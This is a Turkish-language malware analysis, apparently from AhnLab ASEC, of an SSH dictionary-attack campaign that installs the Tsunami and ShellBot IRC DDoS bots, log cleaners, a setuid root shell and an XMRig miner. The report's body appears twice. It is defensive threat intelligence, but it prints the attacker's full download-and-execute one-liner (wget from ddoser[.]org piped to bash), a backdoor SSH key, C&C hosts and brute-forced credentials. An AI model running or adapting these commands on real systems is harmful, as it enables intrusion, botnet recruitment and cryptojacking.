AhnLab Güvenlik Acil Durum Müdahale Merkezi (ASEC) kısa bir süre önce, yetersiz yönetilen Linux SSH sunucularına kurulan Tsunami DDoS Botundan oluşan bir saldırı kampanyası keşfetti. Tehdit aktörü yalnızca Tsunami’yi yüklemekle kalmadı, aynı zamanda ShellBot, XMRig CoinMiner ve Log Cleaner gibi çeşitli başka kötü amaçlı yazılımları da yükledi.
Kötü yönetilen Linux SSH sunucularına yönelik saldırı durumlarına bakıldığında, bunların çoğu DDoS botlarının veya CoinMiners’ın kurulumunu içerir. DDoS botu, daha önce ShellBot [1] ve ChinaZ DDoS Botunun [2] yüklendiği saldırı vakalarında ASEC Blogunda ele alınmıştır . XMRig CoinMiner’ın kurulumu, SHC kötü amaçlı yazılımı [3] ve KONO DIO DA saldırı kampanyası [4] ile birlikte ele alındı .
Tsunami, Kaiten olarak da bilinen bir DDoS botudur. Genellikle savunmasız olan IoT cihazlarını hedeflerken Mirai ve Gafgyt ile birlikte sürekli olarak dağıtılan birkaç kötü amaçlı yazılım türünden biridir. Hepsinin DDoS botları olma ortak paydası olsa da Tsunami, tehdit aktörüyle iletişim kurmak için IRC’yi kullanan bir IRC botu gibi çalışmasıyla diğerlerinden sıyrılıyor.
Tsunami’nin kaynak kodu herkese açıktır, bu nedenle çok sayıda tehdit aktörü tarafından kullanılır. Çeşitli kullanımları arasında en çok IoT cihazlarına yönelik saldırılarda kullanılır. Tabii ki, aynı zamanda sürekli olarak Linux sunucularını hedeflemek için kullanılır. Ek olarak, XMRig CoinMiner’ın Tsunami ile halka açık bir Docker konteynerine dağıtıldığı duruma benzer şekilde, bir bulut ortamına da dağıtıldıkları başka bir vaka doğrulandı. Ayrıca, resmi olmayan bir şekilde dağıtılan Docker kapsayıcılarına kötü amaçlı yazılım dahil etmek, birincil saldırı vektörlerinden biridir.
Bu gönderi, bir tehdit aktörünün sözlük saldırıları gerçekleştirdikten sonra kötü yönetilen SSH sunucularında oturum açmayı başardığı ve ardından DDoS Botları ve XMRig CoinMiner’ı yüklediği bir durumu ele alacaktır.
1. Linux SSH Sunucularına Karşı Sözlük Saldırısı
Kötü yönetilen hizmetler, Linux sunucuları gibi sunucu ortamlarını hedeflemek için kullanılan saldırı vektörlerinin başlıca örneklerinden biridir. Secure Shell (SSH) hizmeti çoğu Linux sunucu ortamında kuruludur, saldırılar için kolayca kullanılabilir ve kötü yönetime eğilimlidir. SSH, yöneticilerin uzaktan oturum açmasına ve sistemi kontrol etmesine izin verir, ancak bunu yapmak için sisteme kayıtlı kullanıcı hesabında oturum açmaları gerekir.
Bir Linux sisteminde basit hesap kimlik bilgileri (ID/PW) kullanılıyorsa, bir tehdit aktörü kaba kuvvet veya sözlük saldırısı yoluyla sisteme giriş yaparak kötü amaçlı komutlar yürütmesine izin verebilir. Kötü yönetilen Linux SSH sunucularına saldırıldığında, ana saldırı yöntemi, port taraması yoluyla harici olarak açığa çıkan SSH sunucularını aramayı ve sözlük saldırıları gerçekleştirmek ve oturum açmak için bilinen hesap kimlik bilgilerini kullanmayı içerir. Daha sonra kötü amaçlı yazılım indirilir.
Aşağıdaki tablo, yukarıda belirtilen saldırı kampanyasından, saldırıya uğrayan adresleri kimlikleri ve şifreleriyle birlikte gösteren listenin bir bölümüdür.
ID
Password
Attack Target
admin
qwe123Q#
124.160.40[.]48
sxit
sxit
124.160.40[.]94
root
abcdefghi
124.160.40[.]94
root
123@abc
124.160.40[.]94
weblogic
123
124.160.40[.]94
rpcuser
rpcuser
124.160.40[.]94
test
p@ssw0rd
124.160.40[.]94
nologin
nologin
124.160.40[.]94
Hadoop
p@ssw0rd
124.160.40[.]94
hxw
test123
124.160.40[.]94
backlog
backlog
124.160.40[.]94
dell
123
124.160.40[.]94
Table 1. Attack locations and account credentials used in the attack campaign
2. Saldırı Akışı
Başarıyla oturum açtıktan sonra, tehdit aktörü çeşitli kötü amaçlı yazılımları indirip çalıştırmak için aşağıdakine benzer bir komut yürütür.
Yüklenen kötü amaçlı yazılımlar arasında “anahtar” dosyası, ek kötü amaçlı yazılımlar yükleyen indirici tipi bir Bash betiğidir. Bir indirici olmanın yanı sıra, bir arka kapı SSH hesabı kurmayı da içeren, virüs bulaşmış sistemlerin kontrolünü ele geçirmek için çeşitli ön görevleri yerine getirir.
Şekil 1. “anahtar” Bash betiği
Uzak bir SSH sunucusunda oturum açarken, genel ve özel anahtarlar üreterek ID ve PW olmadan oturum açmak mümkündür. Bunu başarmak için, bir kullanıcı genel ve özel SSH anahtarları oluşturabilir ve ardından genel anahtarını istediği sunucuya kaydedebilir. Daha sonra, özel anahtar istemcide oturum açmak için kullanılabilir. Tehdit aktörü, aşağıdaki genel anahtarı “yetkili_anahtarlar” dosyasına yeni yazmak için bu komutu kullanır. Bunu yaparak, tehdit aktörü daha sonra ortak anahtara karşılık gelen özel anahtarı kullanabilir ve virüs bulaşmış sistemde oturum açmalarına izin verir.
Yürütülen komut ve oturum açtıktan sonra indirici Bash betiği aracılığıyla yüklenen kötü amaçlı yazılımlar aşağıda özetlenmiştir. Her kötü amaçlı yazılım türünün analizi de sağlanır.
3. Kötü Amaçlı Yazılım Analizi
3.1. tsunami
Kaiten olarak da bilinen DDoS bot kötü amaçlı yazılımı olan Tsunami, kaynak kodu herkese açık olduğundan çeşitli tehdit aktörleri tarafından kullanılmaktadır. Tehdit aktörleri, daha fazla özellik eklemek için genellikle mevcut Kaiten’in kaynak kodunu değiştirir ve bu saldırıda kullanılan Tsunami, Kaiten’in Ziggy adlı bir çeşididir. Gerçek yardım komutunda gösterilen açıklamalar karşılaştırıldığında, bunlar kaynak koduyla aynıdır.
Tsunami ikili dosyasında yer alan yapılandırma verilerine bakıldığında, tehdit aktörünün ona “ddoser – v0.69” adını eklediğini görebilirsiniz.
Tsunami’nin bir özelliği, C&C sunucularıyla iletişim kurmak için bir IRC protokolü kullanmasıdır. IRC, 1988’de geliştirilmiş gerçek zamanlı bir İnternet sohbet protokolüdür. Kullanıcılar, belirli IRC sunucularının belirli kanallarında oturum açar ve aynı kanalda oturum açmış diğer kullanıcılarla gerçek zamanlı olarak sohbet eder. IRC botu, C&C sunucularıyla iletişim kurmak için bu IRC hizmetini kötüye kullanan bir bot kötü amaçlı yazılımıdır.
Etkilenen sisteme kurulan IRC bot, bir IRC sunucusunun IRC protokolüne göre tehdit aktörü tarafından belirlenen kanalına erişir ve ardından çalınan bilgileri belirtilen kanala iletir veya saldırgan belirli bir diziyi girdiğinde bunu alır. komut verir ve ilgili kötü niyetli davranışı gerçekleştirir. IRC, ayrı bir C&C sunucusu ve protokolü geliştirmek zorunda kalmadan önceden var olan bir IRC protokolünü ve IRC sunucusunu kullandığı için kötü amaçlı yazılımlardan tutarlı bir şekilde yararlandığını gördü.
Tsunami çalıştırıldığında, “/etc/rc.local” dosyasına kendi yolunu yazar ve yeniden başlatmalardan sonra bile çalışmasını sağlar. Daha sonra çalışmakta olan işlemin adını “[kworker/0:0]” olarak değiştirmeye çalışır. Bu, normal bir işlemle aynı adı verir ve kullanıcıların fark etmesini zorlaştırır. Tsunami bu noktaya geldiğinde IRC sunucusuna bağlanır, bir kanala katılır ve tehdit aktörünün komutlarını bekler.
Ek olarak, C&C adresi ve kanal şifresi gibi bilgiler şifrelenir ve kaydedilir. Tsunami, yürütülmesi sırasında ihtiyaç duyduğu dizilerin şifresini çözer ve alır. İki C&C sunucu adresi vardır ve Tsunami bağlantı kurmak için bunlardan birini rastgele seçer.
Aşağıdaki tablo, C&C sunucu adresine dahil olan çeşitli yapılandırma verilerinin ayrıntılarını vermektedir. Bir IRC sunucusuna katılırken takma ad olarak rastgele bir dizi kullanıldığını unutmayın.
Configuration
Data
Version
ddoser – v0.69
Architectre
x86_64
Name to disguise itself as
[kworker/0:0]
C&C server (IRC)
ircx.us[.]to:53
ircxx.us[.]to:53
IRC channel name
ddoser
IRC channel password (enc_passwd)
bakla
Activation/deactivation password
null
Default HTTP server address for downloading
localhost (deactivated)
Tsunami, temel IRC komutlarıyla birlikte çeşitli DDoS saldırı komutlarını destekler. Ayrıca, sistem bilgisi toplama, komut yürütme ve ters kabuk gibi virüslü sistemleri kontrol etmeye yönelik özellikler de sağlar.
Type
Command
Feature
Remote control
SYSINFO
System information
(CPU, memory, network information, OS version, login user, Uptime)
GET
Download file from external source
UPDATE
Update bot
ENABLE / DISABLE
Activate/deactivate bot (password required)
SH / ISH / SHD / BASH
Execute shell command
RSHELL
Reverse shell
KILL
Terminate
DDoS attack
PAN / SYNFLOOD / NSSYNFLOOD
SYN Flood
ACKFLOOD / NSACKFLOOD
Ack Flood
RANDOMFLOOD
Syn/Ack Flooder
UDP
UDP Flood
UNKNOWN
Non-spoof UDP Flood
SPOOFS
IP spoofing during DDoS attack
GETSPOOFS
Return IP spoofing used during DDoS attack
KILLALL
Terminate attack
3.2. ShellBot
İlk yürütme komutu ve Bash indirici “anahtarı” aracılığıyla yüklenen “bot” ve “logo” aslında aynı ShellBot kötü amaçlı yazılımıdır. ShellBot, Perl’de geliştirilmiş bir DDoS botudur ve aynı zamanda Tsunami gibi IRC protokolünü kullanan bir IRC Botudur. Daha önce ASEC Blogunda, kötü yönetilen Linux SSH sunucularına saldırmak için kullanılan ShellBot kötü amaçlı yazılımı kategorize edilmiş ve analiz edilmişti. [5] Bu saldırıda kullanılan ShellBot suşları, önceki gönderide ele alınanların hiçbiriyle aynı değildir, ancak inkar edilemez bir şekilde ShellBot’un varyantlarıdır.
Bu saldırıda kullanılan ShellBot’ların tümü, C&C sunucu adresini ve port numarasını argüman olarak alarak çalışır. Saldırıda kullanılan C&C sunucu adreslerinin listesi aşağıdadır.
ShellBot
IRC Server Address
logo
irc.undernet[.]org:6667
bot
ircx.us[.]to:6667
bot
irc.dal[.]net:6667
bot
irc.undernet[.]org:6667
bot
ircx.us[.]to:20
Diğer ShellBot’lara benzer şekilde, tuttukları listeden bir takma ad seçilir. Kanalda komut verebilmek için admin kılığında kanala giren tehdit aktörünün rumuz ve host adresi doğrulanır. IRC kanalı, Tsunami kötü amaçlı yazılımı “#ddoser” ile aynı adı kullanır.
ShellBot, bağlantı noktası taramayı, temel DDoS saldırılarını ve ters kabukları destekler.
Command
Feature
portscan
Port scan
udpflood
UDP Flood
tcpflood
TCP Flood
httpflood
HTTP Flood
back
Reverse shell
3.3. Günlük Temizleyici
Log Cleaner kötü amaçlı yazılımı, tehdit aktörü tarafından yüklenen kötü amaçlı yazılımlar arasında yer alır. Linux sunucu ortamlarında, kullanıcıların veya tehdit aktörlerinin faaliyetlerini kaydeden çeşitli türde günlük dosyaları vardır. Günlük Temizleyici, bu günlük dosyalarındaki belirli günlüklerin silinmesini veya değiştirilmesini sağlayan bir araçtır. Tehdit aktörünün, ihlallerinin sonraki analizlerini engellemek amacıyla Log Cleaner’ı yüklediğine inanılıyor.
Yüklenen dosyalar arasında “cls”, “MIG Logcleaner v2.0” ve “clean”, “0x333shadow Log Cleaner” dir. Yeni başlayanlar için MIG LogCleaner, Linux, Unix ve BSD sistemlerinden istenen günlükleri silmek için aşağıda gösterilenler gibi çeşitli seçenekleri bağımsız değişken olarak alma yeteneğine sahiptir.
Argument
Description
[-u <user>]
User name
[-n <n>]
Number of entries to delete. The default is 1. 0 will select all.
[-D <dir>]
Base log directory (Default is /var/log/)
[-a <string1>]
IP string to remove from files within the log directory
[-b <string2>]
Domain string to remove from files within the log directory
[-R]
Replace Mode
[-A]
Add Mode
[-U <user>]
User name to change or add in Replace or Add Mode
[-H <host>]
Host name to change or add in Replace or Add Mode
[-I <n>]
Login time to change or add in Replace or Add Mode
[-O <n>]
Logout time to change or add in Replace or Add Mode
[-T <tty>]
tty to add in Add Mode
[-d]
Run in debug mode
Bir Linux ortamında oturum açmış kullanıcılara ilişkin günlük dosyaları aşağıdaki gibidir ve tehdit aktörleri bu günlük dosyalarını manipüle ederek oturum açma kayıtlarını silebilir veya değiştirebilir.
Çeşitli günlük dosyaları MIG LogCleaner aracılığıyla değiştirilebilir. Örneğin, belirli bir dizeye sahip satırları silebilir, dizeyi değiştirebilir veya yeni bir dize ekleyebilir. Ayrıca, bir giriş kaydı eklemek için aşağıdaki gibi bir komut kullanılabilir.
Birlikte yüklenen “0x333shadow Log Cleaner” aynı özelliklere sahiptir.
3.4. Ayrıcalık Yükseltme Kötü Amaçlı Yazılımı
“ping6” dosyası, aşağıdaki basit yapıya sahip bir ELF kötü amaçlı yazılımıdır. setuid() ve setgid() işlevleri, kabuğu çalıştırmadan önce kullanıcı kimliğini ve grup kimliğini kök hesap olarak ayarlamak için kullanılır.
“Anahtar” Bash betiği, “ping6” yüklendikten sonra setuid’i ayarlar. Kök hesapla başarılı bir giriş yapılırsa ve hesapla birlikte “anahtar” Bash komut dosyası yüklenirse, tehdit aktörü daha sonra kök ayrıcalıklarına sahip bir kabuğa erişim elde etmek için “ping6″yı kullanabilir.
3.5. XMRig CoinMiner
Bu özel saldırı kampanyasında, DDoS botlarının yanı sıra bir CoinMiner da kurulur. Bir sözlük saldırısı aracılığıyla oturum açtıktan sonra yürütülen komut, tar adlı sıkıştırılmış bir dosyayı indirir ve açar. Ortaya çıkan “go” dosyası daha sonra yürütülür. Basit bir Bash betiği olarak “go”, aynı yolda bulunan “televizor” dosyasını yürütür. “televizor” aynı zamanda bir Bash betiğidir ve “telecomanda” Bash betiğini yürütür. Bu sonuçta XMRig CoinMiner “cnrig” in yürütülmesine yol açar.
Madeni para madenciliği için gerekli olan yapılandırma verileri, aynı yol üzerinde bulunan “config.json” dosyasında tutulur.
Mining Pool : monerohash[.]com:80
user : “46WyHX3L85SAp3oKu1im7EgaVGBsWYhf7KxrebESVE6QHA5vJRab6wF1gsVkYwJfnNV2KYHU1Xq2A9XUYmWhvzPf2E6Nvse”
pass : “nobody”
4. Sonuç
Kötü yönetilen Linux SSH sunucularına yönelik saldırı kampanyaları, oldukça uzun bir süredir ısrarla gerçekleşmektedir. Tehdit aktörü, virüslü sistemlerde Tsunami ve ShellBot gibi DDoS botlarının yanı sıra XMRig CoinMiner’ı kurdu.
CoinMiner’ın kurulu olduğu ortamlarda, virüslü sistemin kaynakları, tehdit aktörü için Monero madeni paraları çıkarmak için kullanılır. Virüs bulaşmış sistemler, ayrıca yüklenen DDoS botları nedeniyle DDoS saldırıları için kullanılabilir ve ek kötü amaçlı komutların yürütülmesine izin verir. Bu kötü amaçlı yazılımlar silinse bile, tehdit aktörü yine yüklemiş olduğu SSH arka kapı hesabını kullanarak sisteme yeniden erişim sağlayabilir. Bu, farklı kötü amaçlı yazılım yüklemek ve sistemden bilgi çalmak gibi çeşitli kötü amaçlı davranışlar gerçekleştirmelerine olanak tanır.
Bu nedenle yöneticiler, Linux sunucusunu kaba kuvvet saldırılarından ve sözlük saldırılarından korumak için hesapları için tahmin edilmesi zor parolalar kullanmalı ve bunları periyodik olarak değiştirmeli ve güvenlik açığı saldırılarını önlemek için en son yamaya güncelleme yapmalıdır. Saldırganların erişimini kısıtlamak için dışarıdan erişilebilen sunucular için güvenlik duvarları gibi güvenlik programları da kullanmalıdırlar. Son olarak, kötü amaçlı yazılım bulaşmasını önceden engellemek için V3’ü en son sürüme güncelleyerek dikkatli olunmalıdır.
Linux Sunucular Tehlike Altında
AhnLab Güvenlik Acil Durum Müdahale Merkezi (ASEC) kısa bir süre önce, yetersiz yönetilen Linux SSH sunucularına kurulan Tsunami DDoS Botundan oluşan bir saldırı kampanyası keşfetti. Tehdit aktörü yalnızca Tsunami’yi yüklemekle kalmadı, aynı zamanda ShellBot, XMRig CoinMiner ve Log Cleaner gibi çeşitli başka kötü amaçlı yazılımları da yükledi.
Kötü yönetilen Linux SSH sunucularına yönelik saldırı durumlarına bakıldığında, bunların çoğu DDoS botlarının veya CoinMiners’ın kurulumunu içerir. DDoS botu, daha önce ShellBot [1] ve ChinaZ DDoS Botunun [2] yüklendiği saldırı vakalarında ASEC Blogunda ele alınmıştır . XMRig CoinMiner’ın kurulumu, SHC kötü amaçlı yazılımı [3] ve KONO DIO DA saldırı kampanyası [4] ile birlikte ele alındı .
Tsunami, Kaiten olarak da bilinen bir DDoS botudur. Genellikle savunmasız olan IoT cihazlarını hedeflerken Mirai ve Gafgyt ile birlikte sürekli olarak dağıtılan birkaç kötü amaçlı yazılım türünden biridir. Hepsinin DDoS botları olma ortak paydası olsa da Tsunami, tehdit aktörüyle iletişim kurmak için IRC’yi kullanan bir IRC botu gibi çalışmasıyla diğerlerinden sıyrılıyor.
Tsunami’nin kaynak kodu herkese açıktır, bu nedenle çok sayıda tehdit aktörü tarafından kullanılır. Çeşitli kullanımları arasında en çok IoT cihazlarına yönelik saldırılarda kullanılır. Tabii ki, aynı zamanda sürekli olarak Linux sunucularını hedeflemek için kullanılır. Ek olarak, XMRig CoinMiner’ın Tsunami ile halka açık bir Docker konteynerine dağıtıldığı duruma benzer şekilde, bir bulut ortamına da dağıtıldıkları başka bir vaka doğrulandı. Ayrıca, resmi olmayan bir şekilde dağıtılan Docker kapsayıcılarına kötü amaçlı yazılım dahil etmek, birincil saldırı vektörlerinden biridir.
Bu gönderi, bir tehdit aktörünün sözlük saldırıları gerçekleştirdikten sonra kötü yönetilen SSH sunucularında oturum açmayı başardığı ve ardından DDoS Botları ve XMRig CoinMiner’ı yüklediği bir durumu ele alacaktır.
1. Linux SSH Sunucularına Karşı Sözlük Saldırısı
Kötü yönetilen hizmetler, Linux sunucuları gibi sunucu ortamlarını hedeflemek için kullanılan saldırı vektörlerinin başlıca örneklerinden biridir. Secure Shell (SSH) hizmeti çoğu Linux sunucu ortamında kuruludur, saldırılar için kolayca kullanılabilir ve kötü yönetime eğilimlidir. SSH, yöneticilerin uzaktan oturum açmasına ve sistemi kontrol etmesine izin verir, ancak bunu yapmak için sisteme kayıtlı kullanıcı hesabında oturum açmaları gerekir.
Bir Linux sisteminde basit hesap kimlik bilgileri (ID/PW) kullanılıyorsa, bir tehdit aktörü kaba kuvvet veya sözlük saldırısı yoluyla sisteme giriş yaparak kötü amaçlı komutlar yürütmesine izin verebilir. Kötü yönetilen Linux SSH sunucularına saldırıldığında, ana saldırı yöntemi, port taraması yoluyla harici olarak açığa çıkan SSH sunucularını aramayı ve sözlük saldırıları gerçekleştirmek ve oturum açmak için bilinen hesap kimlik bilgilerini kullanmayı içerir. Daha sonra kötü amaçlı yazılım indirilir.
Aşağıdaki tablo, yukarıda belirtilen saldırı kampanyasından, saldırıya uğrayan adresleri kimlikleri ve şifreleriyle birlikte gösteren listenin bir bölümüdür.
Table 1. Attack locations and account credentials used in the attack campaign
2. Saldırı Akışı
Başarıyla oturum açtıktan sonra, tehdit aktörü çeşitli kötü amaçlı yazılımları indirip çalıştırmak için aşağıdakine benzer bir komut yürütür.
# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &Yüklenen kötü amaçlı yazılımlar arasında “anahtar” dosyası, ek kötü amaçlı yazılımlar yükleyen indirici tipi bir Bash betiğidir. Bir indirici olmanın yanı sıra, bir arka kapı SSH hesabı kurmayı da içeren, virüs bulaşmış sistemlerin kontrolünü ele geçirmek için çeşitli ön görevleri yerine getirir.
Şekil 1. “anahtar” Bash betiği
Uzak bir SSH sunucusunda oturum açarken, genel ve özel anahtarlar üreterek ID ve PW olmadan oturum açmak mümkündür. Bunu başarmak için, bir kullanıcı genel ve özel SSH anahtarları oluşturabilir ve ardından genel anahtarını istediği sunucuya kaydedebilir. Daha sonra, özel anahtar istemcide oturum açmak için kullanılabilir. Tehdit aktörü, aşağıdaki genel anahtarı “yetkili_anahtarlar” dosyasına yeni yazmak için bu komutu kullanır. Bunu yaparak, tehdit aktörü daha sonra ortak anahtara karşılık gelen özel anahtarı kullanabilir ve virüs bulaşmış sistemde oturum açmalarına izin verir.
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9h Vz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqo AoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iDYürütülen komut ve oturum açtıktan sonra indirici Bash betiği aracılığıyla yüklenen kötü amaçlı yazılımlar aşağıda özetlenmiştir. Her kötü amaçlı yazılım türünün analizi de sağlanır.
3. Kötü Amaçlı Yazılım Analizi
3.1. tsunami
Kaiten olarak da bilinen DDoS bot kötü amaçlı yazılımı olan Tsunami, kaynak kodu herkese açık olduğundan çeşitli tehdit aktörleri tarafından kullanılmaktadır. Tehdit aktörleri, daha fazla özellik eklemek için genellikle mevcut Kaiten’in kaynak kodunu değiştirir ve bu saldırıda kullanılan Tsunami, Kaiten’in Ziggy adlı bir çeşididir. Gerçek yardım komutunda gösterilen açıklamalar karşılaştırıldığında, bunlar kaynak koduyla aynıdır.
Tsunami ikili dosyasında yer alan yapılandırma verilerine bakıldığında, tehdit aktörünün ona “ddoser – v0.69” adını eklediğini görebilirsiniz.
Tsunami’nin bir özelliği, C&C sunucularıyla iletişim kurmak için bir IRC protokolü kullanmasıdır. IRC, 1988’de geliştirilmiş gerçek zamanlı bir İnternet sohbet protokolüdür. Kullanıcılar, belirli IRC sunucularının belirli kanallarında oturum açar ve aynı kanalda oturum açmış diğer kullanıcılarla gerçek zamanlı olarak sohbet eder. IRC botu, C&C sunucularıyla iletişim kurmak için bu IRC hizmetini kötüye kullanan bir bot kötü amaçlı yazılımıdır.
Etkilenen sisteme kurulan IRC bot, bir IRC sunucusunun IRC protokolüne göre tehdit aktörü tarafından belirlenen kanalına erişir ve ardından çalınan bilgileri belirtilen kanala iletir veya saldırgan belirli bir diziyi girdiğinde bunu alır. komut verir ve ilgili kötü niyetli davranışı gerçekleştirir. IRC, ayrı bir C&C sunucusu ve protokolü geliştirmek zorunda kalmadan önceden var olan bir IRC protokolünü ve IRC sunucusunu kullandığı için kötü amaçlı yazılımlardan tutarlı bir şekilde yararlandığını gördü.
Tsunami çalıştırıldığında, “/etc/rc.local” dosyasına kendi yolunu yazar ve yeniden başlatmalardan sonra bile çalışmasını sağlar. Daha sonra çalışmakta olan işlemin adını “[kworker/0:0]” olarak değiştirmeye çalışır. Bu, normal bir işlemle aynı adı verir ve kullanıcıların fark etmesini zorlaştırır. Tsunami bu noktaya geldiğinde IRC sunucusuna bağlanır, bir kanala katılır ve tehdit aktörünün komutlarını bekler.
Ek olarak, C&C adresi ve kanal şifresi gibi bilgiler şifrelenir ve kaydedilir. Tsunami, yürütülmesi sırasında ihtiyaç duyduğu dizilerin şifresini çözer ve alır. İki C&C sunucu adresi vardır ve Tsunami bağlantı kurmak için bunlardan birini rastgele seçer.
Aşağıdaki tablo, C&C sunucu adresine dahil olan çeşitli yapılandırma verilerinin ayrıntılarını vermektedir. Bir IRC sunucusuna katılırken takma ad olarak rastgele bir dizi kullanıldığını unutmayın.
ircxx.us[.]to:53
Tsunami, temel IRC komutlarıyla birlikte çeşitli DDoS saldırı komutlarını destekler. Ayrıca, sistem bilgisi toplama, komut yürütme ve ters kabuk gibi virüslü sistemleri kontrol etmeye yönelik özellikler de sağlar.
(CPU, memory, network information, OS version, login user, Uptime)
3.2. ShellBot
İlk yürütme komutu ve Bash indirici “anahtarı” aracılığıyla yüklenen “bot” ve “logo” aslında aynı ShellBot kötü amaçlı yazılımıdır. ShellBot, Perl’de geliştirilmiş bir DDoS botudur ve aynı zamanda Tsunami gibi IRC protokolünü kullanan bir IRC Botudur. Daha önce ASEC Blogunda, kötü yönetilen Linux SSH sunucularına saldırmak için kullanılan ShellBot kötü amaçlı yazılımı kategorize edilmiş ve analiz edilmişti. [5] Bu saldırıda kullanılan ShellBot suşları, önceki gönderide ele alınanların hiçbiriyle aynı değildir, ancak inkar edilemez bir şekilde ShellBot’un varyantlarıdır.
Bu saldırıda kullanılan ShellBot’ların tümü, C&C sunucu adresini ve port numarasını argüman olarak alarak çalışır. Saldırıda kullanılan C&C sunucu adreslerinin listesi aşağıdadır.
Diğer ShellBot’lara benzer şekilde, tuttukları listeden bir takma ad seçilir. Kanalda komut verebilmek için admin kılığında kanala giren tehdit aktörünün rumuz ve host adresi doğrulanır. IRC kanalı, Tsunami kötü amaçlı yazılımı “#ddoser” ile aynı adı kullanır.
“Janroe.users.undernet[.]org”,
“ddoser.users.undernet[.]org”,
“ddoser[.]de”,”ddoser[.]org”
“theft.users.undernet[.]org”,
“Janroe.users.undernet[.]org”,
“ddoser[.]org”,”ddoser[.]de”
ShellBot, bağlantı noktası taramayı, temel DDoS saldırılarını ve ters kabukları destekler.
3.3. Günlük Temizleyici
Log Cleaner kötü amaçlı yazılımı, tehdit aktörü tarafından yüklenen kötü amaçlı yazılımlar arasında yer alır. Linux sunucu ortamlarında, kullanıcıların veya tehdit aktörlerinin faaliyetlerini kaydeden çeşitli türde günlük dosyaları vardır. Günlük Temizleyici, bu günlük dosyalarındaki belirli günlüklerin silinmesini veya değiştirilmesini sağlayan bir araçtır. Tehdit aktörünün, ihlallerinin sonraki analizlerini engellemek amacıyla Log Cleaner’ı yüklediğine inanılıyor.
Yüklenen dosyalar arasında “cls”, “MIG Logcleaner v2.0” ve “clean”, “0x333shadow Log Cleaner” dir. Yeni başlayanlar için MIG LogCleaner, Linux, Unix ve BSD sistemlerinden istenen günlükleri silmek için aşağıda gösterilenler gibi çeşitli seçenekleri bağımsız değişken olarak alma yeteneğine sahiptir.
Bir Linux ortamında oturum açmış kullanıcılara ilişkin günlük dosyaları aşağıdaki gibidir ve tehdit aktörleri bu günlük dosyalarını manipüle ederek oturum açma kayıtlarını silebilir veya değiştirebilir.
/var/adm/utmpx (Solaris)
/var/adm/wtmpx (Solaris)
/var/adm/lastlog (Solaris)
finger (Solaris)
Çeşitli günlük dosyaları MIG LogCleaner aracılığıyla değiştirilebilir. Örneğin, belirli bir dizeye sahip satırları silebilir, dizeyi değiştirebilir veya yeni bir dize ekleyebilir. Ayrıca, bir giriş kaydı eklemek için aşağıdaki gibi bir komut kullanılabilir.
Birlikte yüklenen “0x333shadow Log Cleaner” aynı özelliklere sahiptir.
3.4. Ayrıcalık Yükseltme Kötü Amaçlı Yazılımı
“ping6” dosyası, aşağıdaki basit yapıya sahip bir ELF kötü amaçlı yazılımıdır. setuid() ve setgid() işlevleri, kabuğu çalıştırmadan önce kullanıcı kimliğini ve grup kimliğini kök hesap olarak ayarlamak için kullanılır.
“Anahtar” Bash betiği, “ping6” yüklendikten sonra setuid’i ayarlar. Kök hesapla başarılı bir giriş yapılırsa ve hesapla birlikte “anahtar” Bash komut dosyası yüklenirse, tehdit aktörü daha sonra kök ayrıcalıklarına sahip bir kabuğa erişim elde etmek için “ping6″yı kullanabilir.
3.5. XMRig CoinMiner
Bu özel saldırı kampanyasında, DDoS botlarının yanı sıra bir CoinMiner da kurulur. Bir sözlük saldırısı aracılığıyla oturum açtıktan sonra yürütülen komut, tar adlı sıkıştırılmış bir dosyayı indirir ve açar. Ortaya çıkan “go” dosyası daha sonra yürütülür. Basit bir Bash betiği olarak “go”, aynı yolda bulunan “televizor” dosyasını yürütür. “televizor” aynı zamanda bir Bash betiğidir ve “telecomanda” Bash betiğini yürütür. Bu sonuçta XMRig CoinMiner “cnrig” in yürütülmesine yol açar.
Madeni para madenciliği için gerekli olan yapılandırma verileri, aynı yol üzerinde bulunan “config.json” dosyasında tutulur.
Mining Pool : monerohash[.]com:80
user : “46WyHX3L85SAp3oKu1im7EgaVGBsWYhf7KxrebESVE6QHA5vJRab6wF1gsVkYwJfnNV2KYHU1Xq2A9XUYmWhvzPf2E6Nvse”
pass : “nobody”
4. Sonuç
Kötü yönetilen Linux SSH sunucularına yönelik saldırı kampanyaları, oldukça uzun bir süredir ısrarla gerçekleşmektedir. Tehdit aktörü, virüslü sistemlerde Tsunami ve ShellBot gibi DDoS botlarının yanı sıra XMRig CoinMiner’ı kurdu.
CoinMiner’ın kurulu olduğu ortamlarda, virüslü sistemin kaynakları, tehdit aktörü için Monero madeni paraları çıkarmak için kullanılır. Virüs bulaşmış sistemler, ayrıca yüklenen DDoS botları nedeniyle DDoS saldırıları için kullanılabilir ve ek kötü amaçlı komutların yürütülmesine izin verir. Bu kötü amaçlı yazılımlar silinse bile, tehdit aktörü yine yüklemiş olduğu SSH arka kapı hesabını kullanarak sisteme yeniden erişim sağlayabilir. Bu, farklı kötü amaçlı yazılım yüklemek ve sistemden bilgi çalmak gibi çeşitli kötü amaçlı davranışlar gerçekleştirmelerine olanak tanır.
Bu nedenle yöneticiler, Linux sunucusunu kaba kuvvet saldırılarından ve sözlük saldırılarından korumak için hesapları için tahmin edilmesi zor parolalar kullanmalı ve bunları periyodik olarak değiştirmeli ve güvenlik açığı saldırılarını önlemek için en son yamaya güncelleme yapmalıdır. Saldırganların erişimini kısıtlamak için dışarıdan erişilebilen sunucular için güvenlik duvarları gibi güvenlik programları da kullanmalıdırlar. Son olarak, kötü amaçlı yazılım bulaşmasını önceden engellemek için V3’ü en son sürüme güncelleyerek dikkatli olunmalıdır.
Dosya Algılama
